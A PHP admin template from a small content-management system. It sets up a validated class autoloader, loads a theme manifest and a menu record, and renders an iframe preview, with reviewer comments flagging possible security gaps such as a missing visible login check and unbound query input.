<?php
/*
@author suxoza <suxoza@gmail.com>
*/
// Response header, session and runtime settings for this admin template.
header("Content-type: text/html; Charset=utf-8");
session_start();
mb_internal_encoding("UTF-8");
// NOTE(review): E_ALL reports every notice and warning; confirm display_errors
// is off on the live host so messages (which include file paths) go to the log
// and not into the page.
error_reporting(E_ALL);
date_default_timezone_set("Asia/Tbilisi");

// Loaded by relative path before the include path is extended below.
require_once '../../clases/Exception.php';

// Append three lookup directories to the current include path. The last two
// are derived from DOCUMENT_ROOT with every '/admin' occurrence removed.
set_include_path(implode(PATH_SEPARATOR, [
    get_include_path(),
    $_SERVER['DOCUMENT_ROOT'].'/clases',
    str_replace('/admin','',$_SERVER['DOCUMENT_ROOT']).'/Smarty',
    str_replace('/admin','',$_SERVER['DOCUMENT_ROOT']).'/cls',
]));

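    /**
     * Autoloader callback: loads "<ClassName>.php" from the include path.
     *
     * The class name becomes part of a file path, so only plain PHP
     * identifiers are accepted. Anything containing a path separator, a dot,
     * a NUL byte or a namespace backslash is ignored instead of being handed
     * to require_once. A class whose file cannot be resolved is skipped
     * silently as well, so that other registered autoloaders still get their
     * turn and PHP reports an ordinary "class not found" error rather than a
     * fatal include failure.
     *
     * @param string $class Unqualified class name requested by the engine.
     * @return void
     */
    function class_loader($class){
        // Same character set PHP itself allows for a class label.
        if(!is_string($class) || !preg_match('/^[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff]*\z/', $class)){
            return;
        }

        // Resolve against the include path first; false means "no such file".
        $file = stream_resolve_include_path($class.'.php');
        if($file === false){
            return;
        }

        require_once $file;
    }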

    // From here on, unknown classes are resolved through class_loader().
    spl_autoload_register('class_loader');

     // Application object used by the rest of this template.
     // NOTE(review): no login or permission check is visible in this file;
     // presumably Central enforces the admin session -- confirm, since this
     // script sits under admin/ and is reachable by URL.
     $_ = new Central();
     
   
//     $mas = [
//         'structure' => [ 
//              'name'   => ['ზედა მენიუ','ქვედა მენიუ','მენიუ ცენტრში','სლაიდი','header ბლოკი','footer ბლოკი'],
//              'params' => ['_top_menu_','_bottom_menu_','_center_menu_','_slide_block','_header_block_','_footer_block_']
//         ]    
//     ];
//     echo Central::_json_encode($mas);
     
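     // Load and validate manifest.json of the active theme. On success
     // $manifest holds the decoded object, which must expose ->structure.
     //
     // The path, the raw file contents and the decoded value are kept in
     // separate variables. The previous version reused $manifest for all three
     // and echoed it in the catch block, which printed the server-side path or
     // the raw file into the page and, once decoding had succeeded, tried to
     // echo an object (a string-conversion error that hid the real message).
     // NOTE(review): the theme name is concatenated into a filesystem path;
     // confirm it can only come from trusted configuration.
     $manifestPath = $_->_dir.'templates/'.$_->_default_theme['name'].'/manifest.json';
     try{
         if(!file_exists($manifestPath))throw new Module_not_found('თემის მანიფესტ ფაილი ვერ მოიძებნა');
         $manifestRaw = file_get_contents($manifestPath);
         if(!$manifestRaw)throw new Module_not_found('თემის მანიფესტ ფაილი არ შეილება იყოს ცარიელი');
         $manifest = json_decode($manifestRaw);
         if(json_last_error() || !isset($manifest->structure))throw new Module_not_found('თემის მანიფესტ ფაილი შეიცავს შეცდომებს');
     }catch(Module_not_found $ex){
         // Details stay in the server log; the browser only gets the fixed message.
         error_log('schema.php: theme manifest rejected: '.$manifestPath);
         die($ex->getMessage());
     }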
     
     
//     $height_ = $_GET['height']/2+$_GET['height']/3;
//     $width_  = $_GET['width']/2+$_GET['width']/3;
     
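     $language = $_->_lang;

     // Menu id from the query string: '' when absent, otherwise an integer.
     // A request can also send id as an array (id[]=...); the old expression
     // passed that straight to strip_tags(), which raised warnings before
     // ending up at 0. The array case now yields 0 directly.
     if(!isset($_GET['id'])){
         $_ID = '';
     }elseif(is_string($_GET['id'])){
         $_ID = (int)trim(strip_tags($_GET['id']));
     }else{
         $_ID = 0;
     }

     // NOTE(review): how select() builds its query is not visible here;
     // confirm it binds the id as a parameter rather than concatenating it.
     $select = $_->select("attributes","menu","small",["id",$_ID]);
     // Anything longer than 10 characters is treated as a JSON payload.
     if(strlen($select) > 10){
         $select = json_decode($select);
     }

    // Address loaded into the preview iframe further down the page.
    // NOTE(review): hard-coded plain-http origin -- confirm this is intended.
    $url = "http://kharagauli";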
    

    ?>
<!--<iframe id="scheme" width="100%" height="100%" src="<?=$url;?>" frameborder="0" allowfullscreen=""></iframe>-->
<!--<script src="../../js/live1.js"></script>
<body>
<script>

var xx = document.createElement('iframe');
xx.src = '<?=$url;?>';
xx.width = "100%";
xx.height = "100%";
xx.frameborder = 0;
var dd = document.createElement('div');

document.body.appendChild(xx);
xx.onload = function(){
    alert(this.src);
   var y = (this.contentWindow || this.contentDocument);
   if (y.document)y = y.document;
   y.body.style.backgroundColor="red";
}
// var x = document.getElementById("scheme");
//var y = (x.contentWindow || x.contentDocument);
//if (y.document)y = y.document;
//y.body.style.backgroundColor="red";

</script>
</body>-->

<html>
   <head>
      <title>Adding Dynamic Contents to IFrames</title>
 

      <script type="text/javascript">
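          /**
           * Creates an iframe for the server-rendered URL, appends it to
           * parentElement (document.body when none is given) and returns it.
           * The document available right after insertion is stored on the
           * element as .doc.
           *
           * @param {Element|null} parentElement container for the iframe
           * @returns {HTMLIFrameElement} the created element, with .doc set
           * @throws {string} when no document can be reached on the new iframe
           */
          function IFrame(parentElement){
               var iframe = document.createElement("iframe");
               // The address is written by the server directly into this string
               // literal without any encoding. That is only safe while the value
               // is the fixed constant assigned in this file; if it ever comes
               // from a request or the database, emit it with json_encode().
               iframe.src='<?=$url;?>';
               iframe.width = "100%";
               iframe.height = "100%";
               // Assigning iframe.frameborder only created an unused property;
               // the border is controlled by the attribute.
               iframe.setAttribute("frameborder", "0");
               if(parentElement == null)
                  parentElement = document.body;
               parentElement.appendChild(iframe);
               // First reachable document wins; null when none is exposed.
               iframe.doc = iframe.contentDocument
                  || (iframe.contentWindow && iframe.contentWindow.document)
                  || iframe.document
                  || null;
               if(iframe.doc == null)
                  throw "Document not found, append the parent element to the DOM before creating the IFrame";

               return iframe;
            }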
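         /**
          * Page load handler: places the preview iframe inside #canvas and,
          * once the framed page has loaded, paints its body red.
          *
          * The document is looked up again inside the load handler. The one
          * stored by IFrame() at creation time is the frame's initial blank
          * document, which is replaced when the real page arrives. When the
          * framed page is served from a different origin the browser does not
          * expose its document at all; the handler then does nothing.
          */
         function onPageLoad(){
            var canvas = document.getElementById("canvas");
            var iframe = new IFrame(canvas);
            iframe.onload = function(){
                var framedDoc = null;
                try {
                    framedDoc = iframe.contentDocument
                        || (iframe.contentWindow && iframe.contentWindow.document)
                        || null;
                } catch (e) {
                    // Cross-origin access is refused by the browser.
                    framedDoc = null;
                }
                if (!framedDoc || !framedDoc.body)
                    return;
                iframe.doc = framedDoc;
                framedDoc.body.style.background = "red";
            };

         }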
      </script>
   </head>
 
   <body onload="onPageLoad();">
      <div id="canvas" style="border: solid 1px #000000; height: 1000px; width: 100%"></div>
   </body>
</html>
